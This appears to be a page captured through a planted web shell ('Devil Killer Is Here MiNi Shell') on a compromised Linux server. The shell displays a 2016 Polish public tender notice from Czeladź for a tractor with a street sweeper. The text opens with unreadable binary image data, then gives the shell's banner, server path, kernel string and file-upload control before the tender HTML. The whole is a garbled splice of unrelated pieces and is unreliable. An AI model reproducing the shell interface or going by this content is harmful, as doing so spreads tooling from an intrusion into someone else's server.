JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/41786-N-2016.html

<p class="kh_header"><b>Czeladź: Zakup i dostawa ciągnika wraz z zamiatarką</b><br>
<b>Numer ogłoszenia: 41786 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Gospodarki Komunalnej w Czeladzi , ul. Elizy  Orzeszkowej 12, 41-253 Czeladź, woj. śląskie, tel. 032 265 26 53, faks 032 363 26 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa ciągnika wraz z zamiatarką.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa ciągnika wraz z zamiatarką


CPV 16700000 - 2  - Ciągniki
      34921100 - 0 -  Zamiatarki drogowe


Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika wraz z nową zamiatarką z możliwością zastosowania dodatkowego osprzętu. 


Rok produkcji sprzętu: 2015r lub 2016r. 
I. Parametry techniczne ciągnika muszą spełniać poniższe wymagania: 

SILNIK
Moc	Minimum 49,6 KM / 37,3 kW
Moc na WOM 	Minimum 38,6 KM / 28,4 kW
Obroty nominalne	Minimum 2 800 obr / min
Ilość cylindrów	4
Filtr powietrza	Podwójny, suchy
INSTALACJA ELEKTRYCZNA
Alternator	12V , 65A
UKŁAD PALIWOWY
Rodzaj	Wtrysk pośredni
UKŁAD NAPĘDOWY
przekładnia	Mechaniczna, synchronizowana, z rewersem mechanicznym
Ilość biegów	16 / 16
Prędkość maksymalna	33,4 km/h
Hamulce	Tarczowe mokre
Układ kierowniczy	Ze wspomaganiem
Sprzęgło	Jednotarczowe suche
UKŁAD HYDRAULICZNY
Pompa	Podwójna pompa zębata
Wydajność pompy głównej	Minimum 36,1 ltr/min
Wydajność pompy wspomagania	Minimum 19 ltr/min
Maksymalna wydajność układu	Minimum 55,1 ltr/min
Kategoria podnośnika	Kat. II, zaczepy hakowe
Udźwig podnośnika	Minimum 1900 kg
Udźwig podnośnika 60 cm za uchwytami	Minimum 1300 kg
Regulacja podnośnika	Mechaniczna; pozycyjna/siłowa
Układ sterujący ładowaczem (joystick i rozdzielacz)	standard
Liczba zaworów sterujących	2 pary z tyłu / 2 pary z przodu

WOM
Rodzaj	niezależny
Sterowanie	elektrohydrauliczne
Obroty tylnego WOM	540/1000 obr/min
Średnica końcówki WOM	1 3/8 cala / 35 mm
POJEMNOŚCI
Zbiornik paliwa	Minimum 60 ltr
System chłodzenia	Minimum 8,5 ltr
Olej silnikowy (z filtrem)	Minimum 8,2 ltr
Instalacja hydrauliczna	Minimum 35 ltr
Przedni most	Minimum 10 ltr
WYMIARY (NA OGUMIENIU STANDARDOWYM)
Długość całkowita	Do 3590 mm
Szerokość całkowita	Do 1591 mm
Rozstaw osi	Do 1935 mm
Wysokość całkowita	Do 2530 mm
Minimalny prześwit	245 mm
Promień skrętu (z hamulcem)	Do 3352 mm
Promień skrętu (bez hamulca)	Do 3820 mm

II. Parametry techniczne zamiatarki muszą spełniać poniższe wymagania: 


WYMIARY
Długość bez dyszla	Od 2,50 m do 3,00 m
Szerokość bez bocznych szczotek	Od 1,20 m do 1,50 m
Wysokość 	Do 1,60 m
Szerokość zamiatania	Od 1,50 do 1,90 m
Masa brutto	Do 2700 kg
ZBIORNIK NA NIECZYSTOŚCI
Pojemność brutto	Od 1000 do 1150 ltr
Wysokość zrzucania	1,5 m
Pozycja zrzucania	tylna
OPONY
Opony	175x13cal
OŚ
Oś przyczepy wyposażona w urządzenie hamujące oraz układ hamulca postojowego
ELASTYCZNOŚĆ SZCZOTKI
Automatyczne zawieszenie szczotki ruchomej
WYMAGANIA DOTYCZĄCE MOCY
Pojazd holujący z napędowym wałkiem przekaźnikowym 	530-540 obr/min
Minimalną mocą silnika	22kW (30 KM)
WYMAGANIA DOTYCZĄCE MASY
Pojazd holujący minimum	1,675 kg
HYDRAULIKA
Silniki hydrauliczne orbitalne
Hydrauliczna chłodnica oleju
Pompa hydrauliczna ze skrzynią przekładniową
Zbiornik oleju hydraulicznego	Pojemność ok. 120 ltr
SYSTEM ZDOLNEGO STEROWANIA
Elektryczne z kabiną kierowcy
SZYBKOŚĆ PRACY
Szybkość zamiatania	1-18 km/h
Szybkość transportowa	25 km/h
SYSTEM ZRASZANIA
Zbiornik na wodę	ze stali nierdzewnej pojemność ok. 400 ltr
Pompa wodna	pompa membranowa wydajność ok. 14 ltr/min

STOPA POSTOJOWA
Regulowana wysokość
BEZPIECZEŃSTWO
Spełnia normy bezpieczeństwa 
PN-EN 13019
PN-EN 982


III. Pozostałe wymagania dotyczące przedmiotu zamówienia: 

1. Wszystkie podzespoły oraz elementy wyposażenia sprzętu montowane są fabrycznie.

2. Sprzęt w żadnym elemencie nie był wcześniej uszkodzony i został dopuszczony do ruchu przez właściwy organ.

3. Okres gwarancji udzielony przez Wykonawcę min. 2 lata na cały przedmiot zamówienia. Zamawiający nie dopuszcza różnicowania okresów gwarancji na poszczególne elementy w ramach ciągnika oraz w ramach zamiatarki. W przypadku zróżnicowania okresu gwarancji poszczególnego sprzętu - zamiatarki oraz ciągnika do oceny kryterium okresu gwarancji zamawiający przyjmie krótszy z zaoferowanych okresów gwarancji. Zaoferowany przez wykonawcę okres gwarancji będzie odpowiadał okresowi rękojmi. Okres gwarancji stanowi jedno z kryteriów oceny ofert - patrz pkt 13 SIWZ.
Zamawiający dopuszcza aby w/w gwarancja nie obejmowała wymiany elementów takich jak (klocki hamulcowe, oleje, filtry itp.) na skutek naturalnego ich zużycia związanego z eksploatacją sprzętu.

4. Naprawy gwarancyjne bezpłatne, termin naprawy do 3 dni roboczych licząc od dnia zgłoszenia. Dopuszcza się zgłoszenie dokonane drogą mailową lub faksem. 

5. W przypadku awarii sprzętu wymagającej dłuższej, bardziej skomplikowanej naprawy Zamawiający dopuszcza możliwość wydłużenia terminu określonego w pkt 4 na pisemny wniosek Wykonawcy.
  
6. W cenie należy uwzględnić przeglądy gwarancyjne.

7. Koszt dostawy sprzętu pokrywa Wykonawca.

8. Miejsce dostawy ciągnika wraz z zamiatarką - Miejski Zarząd Gospodarki Komunalnej w Czeladzi, ul. Orzeszkowej 12, 41-253 Czeladź.

9. W cenie oferty należy uwzględnić przeszkolenie operatorów pojazdu pod względem eksploatacyjnym oraz technicznym. 

10. Dostarczony sprzęt musi być wyposażony w następujące dokumenty: 

A. Świadectwo homologacji na terenie RP, 

B. Pisemny dokument/y gwarancyjny/e obejmujący/e pełny okres gwarancji zgodnie z postanowieniami pkt III.3. SIWZ.

C. Fabryczna instrukcja obsługi ciągnika i zamiatarki w języku polskim wraz ze wszystkimi dokumentami niezbędnymi do prawidłowej eksploatacji sprzętu przez Zamawiającego, 

D. Komplety kluczy w liczbie dostarczonej przez producenta, 

E. Instrukcja obsługi w języku polskim i katalog części zamiennych, 

F. Książka serwisowa w języku polskim..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 34.92.11.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Warunkiem uczestnictwa w niniejszym postępowaniu jest wniesienie wadium przez Wykonawcę w wysokości: 3 000,00 zł (słownie złotych: trzy tysiące złotych 00/100)

2) Wadium należy wnieść przed upływem terminu składania ofert, określonego w punkcie 11 specyfikacji istotnych warunków zamówienia.
3) Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 p. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (to jest Dz. U. Nr 109, poz. 1158, z późniejszymi zmianami).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
nr rachunku: 64 1050 1227 1000 0023 3771 4543
W tym przypadku za skuteczne wniesienie uznaje się wadium, które przed upływem terminu składania ofert zostało uznane na koncie Zamawiającego.

4) Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem zawartym w uwadze pkt 1 i 2 
5) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego
6) Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał swoją ofertę przed upływem terminu składania ofert. 
7) Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 4, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana jako najkorzystniejsza. W takim przypadku Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
8) W przypadku wniesienia wadium w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
UWAGA:   W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium wraz z odsetkami.
Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a ustawy Prawo zamówień publicznych, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp lub informacji o tym , że nie należy do grupy kapitałowej lub nie wyraził zgody na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
2)	w art. 46 ust. 5 ustawy Prawo zamówień publicznych, tj.: jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres
związania ofertą, poczynając od daty składania ofert.
Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione
prawidłowo.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu , o których mowa w  art. 22 ust. 1 ustawy Pzp, do oferty należy załączyć:

1) Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (zgodnie z zał. nr 2 do SIWZ)
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły - spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach lub oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu , o których mowa w  art. 22 ust. 1 ustawy Pzp, do oferty należy załączyć:

1) Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (zgodnie z zał. nr 2 do SIWZ)

2) Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,  
głównych dostaw (zgodnie z zał. nr 3 do SIWZ) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 

Wykonawca winien wykazać wykonanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, minimum 1 dostawy polegającej na dostawie ciągnika o wartości nie mniejszej niż 170 000 zł brutto. 
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły -spełnia - nie spełnia  w oparciu o informacje zawarte w dokumentach lub oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu , o których mowa w  art. 22 ust. 1 ustawy Pzp, do oferty należy załączyć:

1) Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (zgodnie z zał. nr 2 do SIWZ)
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły -spełnia - nie spełnia  w oparciu o informacje zawarte w dokumentach lub oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu , o których mowa w  art. 22 ust. 1 ustawy Pzp, do oferty należy załączyć:

1) Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (zgodnie z zał. nr 2 do SIWZ)
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły -spełnia - nie spełnia  w oparciu o informacje zawarte w dokumentach lub oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunków udziału w postępowaniu , o których mowa w  art. 22 ust. 1 ustawy Pzp, do oferty należy załączyć:

1) Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy (zgodnie z zał. nr 2 do SIWZ)
2) Opłaconą  polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony  od  odpowiedzialności   cywilnej  w  zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 170.000 zł.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu. 
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły - spełnia - nie spełnia  w oparciu o informacje zawarte w dokumentach lub oświadczeniach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca winien wykazać wykonanie, w okresie ostatnich 3 lat przed upływem terminu składania ofert, minimum 1 dostawy polegającej na dostawie ciągnika o wartości nie mniejszej niż 170 000 zł brutto.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę uprawniające do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty i powinno być złożone formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy (odpisu z właściwego rejestru), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzgk.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-253 Czeladź, ul.Orzeszkowej 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2016 godzina 11:30, miejsce: Sekretariat Miejskiego Zarządu Gospodarki Komunalnej, Czeladź, ul.Orzeszkowej 12.</p>
